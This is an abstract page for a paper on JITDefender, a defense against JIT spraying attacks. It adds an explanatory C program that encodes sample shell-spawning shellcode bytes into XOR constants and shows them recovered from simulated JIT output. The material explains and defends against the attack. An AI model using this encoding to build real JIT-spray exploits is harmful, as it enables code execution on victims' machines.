JITDefender: A Defense against JIT Spraying Attacks

  • Ping Chen
  • Yi Fang
  • Bing Mao
  • Li Xie
Part of the IFIP Advances in Information and Communication Technology book series (IFIPAICT, volume 354)


JIT spraying is a code-reuse technique for attacking virtual machines that use just-in-time (JIT) compilation. It has proven capable of circumventing defenses such as data execution prevention (DEP) and address space layout randomization (ASLR), which are effective against traditional code injection attacks. In this paper we describe JITDefender, an enhancement of standard JIT-based VMs that prevents an attacker from executing arbitrary JIT-compiled code on the VM and thereby blocks JIT spraying attacks. We demonstrate its effectiveness by showing that it stops existing JIT spraying exploits. JITDefender reports no false positives when run over benign ActionScript/JavaScript programs, and its performance overhead is low.
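To make concrete why a JIT-compiled VM is the target, the following added example (written for this page; it is neither the authors' code nor any VM's) models the classic XOR-immediate JIT-spray layout that the abstract's "arbitrary JIT compiled code" refers to. The VM compiles a script expression such as `v = 0x3C50C031 ^ 0x3C2F2F68 ^ ...` into a chain of `xor eax, imm32` instructions in a page the JIT has made executable, so DEP does not apply; an attacker who lands one byte past a `0x35` opcode executes the immediates as code, and spraying many copies makes a guessed address under ASLR likely to hit. The sample payload bytes, the helper names and the simplified single-chain emitter are assumptions for illustration; a real engine emits a leading `mov` and may constant-fold or reorder the chain.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* x86 opcodes that give the layout its shape. */
#define OP_XOR_EAX_IMM32 0x35u   /* xor eax, imm32  (5 bytes: 35 id)   */
#define OP_CMP_AL_IMM8   0x3Cu   /* cmp al, imm8    (2 bytes: 3C ib)   */
#define X86_NOP          0x90u
#define PAYLOAD_PER_IMM  3       /* 3 payload bytes + 0x3C per constant */

/* Constructed sample payload (xor eax,eax; push eax; push 0x68732f2f). */
static const uint8_t SAMPLE_PAYLOAD[] = { 0x31, 0xC0, 0x50, 0x68, 0x2F, 0x2F, 0x73, 0x68 };

/* Pack a payload into imm32 constants: bytes b0 b1 b2 0x3C in memory order.
   The trailing 0x3C is "cmp al, imm8": it eats the next 0x35 so execution
   stays inside the attacker's bytes. Short final chunks are NOP-padded.
   Returns the number of constants, or -1 if max_imms is too small. */
int pack_payload(const uint8_t *payload, size_t len, uint32_t *imms, size_t max_imms)
{
    size_t n = (len + PAYLOAD_PER_IMM - 1) / PAYLOAD_PER_IMM;
    if (n > max_imms) return -1;
    for (size_t i = 0; i < n; i++) {
        uint8_t b[PAYLOAD_PER_IMM];
        for (size_t j = 0; j < PAYLOAD_PER_IMM; j++) {
            size_t k = i * PAYLOAD_PER_IMM + j;
            b[j] = k < len ? payload[k] : X86_NOP;
        }
        /* little-endian: b[0] is emitted first, 0x3C last */
        imms[i] = (uint32_t)b[0] | ((uint32_t)b[1] << 8) |
                  ((uint32_t)b[2] << 16) | (OP_CMP_AL_IMM8 << 24);
    }
    return (int)n;
}

/* Simplified JIT: one "35 imm32" per constant. Returns bytes written or -1. */
int emit_xor_chain(const uint32_t *imms, size_t n, uint8_t *code, size_t max_code)
{
    if (n * 5 > max_code) return -1;
    for (size_t i = 0; i < n; i++) {
        code[i * 5] = OP_XOR_EAX_IMM32;
        for (int j = 0; j < 4; j++)
            code[i * 5 + 1 + j] = (uint8_t)((imms[i] >> (8 * j)) & 0xFF);
    }
    return (int)(n * 5);
}

/* Walk the chain as the CPU would when entered at `entry`: three payload
   bytes, then "3C 35" (cmp al, 0x35) swallowing the next xor opcode.
   Returns the recovered payload length, or -1 if `entry` is not one byte
   past a 0x35 or the glue pattern breaks (entering at 0 just runs the
   harmless xor chain the script author intended). */
int recover_payload(const uint8_t *code, size_t len, size_t entry, uint8_t *out, size_t max_out)
{
    if (entry == 0 || entry > len || code[entry - 1] != OP_XOR_EAX_IMM32) return -1;
    size_t n = 0, pc = entry;
    while (pc < len) {
        if (pc + PAYLOAD_PER_IMM > len || n + PAYLOAD_PER_IMM > max_out) return -1;
        memcpy(out + n, code + pc, PAYLOAD_PER_IMM);
        n += PAYLOAD_PER_IMM;
        pc += PAYLOAD_PER_IMM;
        if (pc >= len || code[pc] != OP_CMP_AL_IMM8) return -1;  /* glue missing */
        pc++;
        if (pc == len) break;                                    /* chain ends */
        if (code[pc] != OP_XOR_EAX_IMM32) return -1;
        pc++;                                                    /* 0x35 eaten as imm8 */
    }
    return (int)n;
}

/* End-to-end check on the sample: pack, emit, re-enter at `entry`.
   Returns the recovered length if the bytes match the payload slice that
   starts at the corresponding constant, -1 if entry is invalid, -2 on mismatch. */
int spray_roundtrip_check(size_t entry)
{
    uint32_t imms[8];
    uint8_t code[64], out[32];
    int n = pack_payload(SAMPLE_PAYLOAD, sizeof SAMPLE_PAYLOAD, imms, 8);
    int len = emit_xor_chain(imms, (size_t)n, code, sizeof code);
    int got = recover_payload(code, (size_t)len, entry, out, sizeof out);
    if (got < 0) return got;
    size_t skip = (entry / 5) * PAYLOAD_PER_IMM;             /* constants before entry */
    for (size_t i = 0; i < (size_t)got; i++) {
        size_t k = skip + i;
        uint8_t want = k < sizeof SAMPLE_PAYLOAD ? SAMPLE_PAYLOAD[k] : X86_NOP;
        if (out[i] != want) return -2;
    }
    return got;
}

int main(void)
{
    uint32_t imms[8];
    int n = pack_payload(SAMPLE_PAYLOAD, sizeof SAMPLE_PAYLOAD, imms, 8);
    printf("var v = 0x%08X", imms[0]);              /* what the attacker's script contains */
    for (int i = 1; i < n; i++) printf(" ^ 0x%08X", imms[i]);
    printf(";\nrecovered %d payload bytes entering at offset 1\n", spray_roundtrip_check(1));
    return 0;
}
```

Entering at offset 1 (or 6, 11, any offset congruent to 1 modulo 5) yields the payload, while offset 0 runs the benign xor chain; that is the asymmetry a defense like JITDefender has to break, since the bytes themselves are legitimate JIT output and look nothing like injected shellcode to a DEP-style page check.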


Keywords (machine-generated): Malicious Code, Performance Overhead, Native Code, Code Snippet, Code Execution



Copyright information

© IFIP International Federation for Information Processing 2011

Authors and Affiliations

Ping Chen, Yi Fang, Bing Mao and Li Xie: State Key Laboratory for Novel Software Technology, Nanjing University, China; Department of Computer Science and Technology, Nanjing University, Nanjing, China
